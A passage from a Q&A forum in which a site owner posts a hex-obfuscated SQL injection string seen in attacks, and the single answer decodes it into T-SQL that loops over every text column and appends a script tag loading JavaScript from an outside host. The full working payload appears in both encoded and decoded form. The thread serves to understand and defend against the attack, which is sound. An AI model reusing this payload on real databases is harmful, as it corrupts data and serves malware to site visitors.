Home/ Questions/Q 90171
In Process

The Archive Base Latest Questions

Editorial Team
  • 0
Asked: 2026-05-10T22:49:53+00:00

Possible Duplicate: Attempted SQL injection attack – what are they trying to do? I

  • 0

Possible Duplicate:
Attempted SQL injection attack – what are they trying to do?

I have seen this SQL injection attempt on my site many times in the last few months. 

';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E73383030716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E73383030716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S);

After going through my code, I’m sure I’m protected because I query against an in-memory dataset rather than the database itself. However, even though I’m sure I’m protected, I don’t fully understand what’s going on with this attack attempt and would like to figure it out so I can avoid writing code in the future that may be vulnerable to it.

Can anyone explain to me what these hackers are attempting to do with this code?

Thanks.

-This code is getting appended to the query string as well as getting sent as post data.

Share

Leave an answer

You must login to add an answer.

Need An Account,

1 Answer

  1. Note: my first explanation was incorrect because I didn’t actually read through the whole thing…

    here’s what that translates to. It searches your database for text or varchar columns (b.xtype in 99,35,231,167) and then injects a javascript file into all text columns in your database. A bit more malicious than I first thought.

    DECLARE      @T varchar(255),     @C varchar(4000)   DECLARE Table_Cursor CURSOR FOR      select a.name,b.name      from sysobjects a,syscolumns b      where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)  OPEN Table_Cursor  FETCH NEXT  FROM  Table_Cursor  INTO @T,@C   WHILE(@@FETCH_STATUS=0)  BEGIN exec('update ['+@T+'] set ['+@C+']='''>     </title>     <script src='http://www2.s800qn.cn/csrss/w.js'></script>       <!--''+['+@C+'] where '+@C+' not like ''%'>     </title>     <script src='http://www2.s800qn.cn/csrss/w.js'></script><!--' '') FETCH NEXT FROM  Table_Cursor INTO @T,@C  END   CLOSE Table_Cursor  DEALLOCATE Table_Cursor
    • 0